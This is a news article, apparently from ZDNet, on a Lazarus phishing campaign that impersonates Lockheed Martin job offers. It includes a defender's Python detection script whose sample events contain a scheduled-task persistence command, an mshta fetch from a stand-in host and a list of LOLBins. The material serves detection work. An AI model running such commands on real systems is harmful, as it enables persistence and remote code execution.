Lazarus has been tied to a new campaign attacking hopeful job applicants in the defense industry.
The advanced persistent threat (APT) group has been impersonating Lockheed Martin in the latest operation. The Bethesda, Maryland-based company is involved in aeronautics, military technology, mission systems, and space exploration.
Lockheed Martin generated $65.4 billion in sales in 2020 and has approximately 114,000 employees worldwide.
Lazarus is a state-sponsored hacking group with ties to North Korea. The prolific and sophisticated group is generally financially motivated and is believed to be responsible for serious attacks in the past, beginning with the WannaCry ransomware outbreak, as well as the $80 million heist against Bangladesh Bank and attacks on freight companies and South Korean supply chains.
On February 8, Qualys Senior Engineer of Threat Research Akshat Pradhan revealed a new campaign using Lockheed Martin’s name to attack job applicants.
As in past activity that abused the names of Northrop Grumman and BAE Systems, Lazarus is sending targets phishing documents that pretend to offer employment opportunities.
The documents, named Lockheed_Martin_JobOpportunities.docx and Salary_Lockheed_Martin_job_opportunities_confidential.doc, contain malicious macros that trigger shellcode to hijack control flow, retrieve decoy documents, and create scheduled tasks for persistence.
Living Off the Land Binaries (LOLBins) are also abused to further the compromise of the target machine. However, when the malicious scripts attempted to pull in a further payload, an error was returned, so Qualys cannot be sure what the final malware package was meant to achieve.
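As an added defender's example, not code from the article or from Qualys, the behaviour chain described above (an Office document whose macro creates a scheduled task and launches LOLBins) can be flagged from process-creation telemetry. The events, process names and command lines below are constructed, and the list of LOLBin children is an assumption rather than something the article reports.

```python
import re

# Constructed process-creation events with Sysmon-style fields; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 30 /tn "Updater" /tr "C:\\Users\\Public\\stage.exe"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/decoy.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /query /fo LIST"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Illustrative set of LOLBins commonly launched by macros (an assumption, not from the article).
SUSPICIOUS_CHILDREN = {"schtasks.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                       "certutil.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a finding label for one process-creation event, or None if benign."""
    parent = basename(event["parent"])
    child = basename(event["image"])
    if parent not in OFFICE_APPS or child not in SUSPICIOUS_CHILDREN:
        return None
    # schtasks /create from an Office parent is the persistence step described in the article.
    if child == "schtasks.exe" and re.search(r"/create\b", event["cmdline"], re.I):
        return "office-spawned-scheduled-task-persistence"
    return "office-spawned-lolbin"


def scan(events):
    """Return (index, label) pairs for every event that matches."""
    return [(i, label) for i, e in enumerate(events) if (label := classify(e)) is not None]
```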
“We attribute this campaign to Lazarus as there is significant overlap in the macro content, campaign flow, and phishing themes of our identified variants as well as older variants that have been attributed to Lazarus by other vendors,” Pradhan says.
This isn't the first time Lazarus has exploited job candidates or vacancies. F-Secure has previously found phishing emails masquerading as job offers that were sent to a system administrator at a targeted cryptocurrency organization.
In related research, Outpost24’s Blueliv cybersecurity team has named Lazarus, Cobalt, and FIN7 as the most prevalent threat groups targeting the financial industry today.
ZDNet has reached out to Lockheed Martin and we will update when we hear back.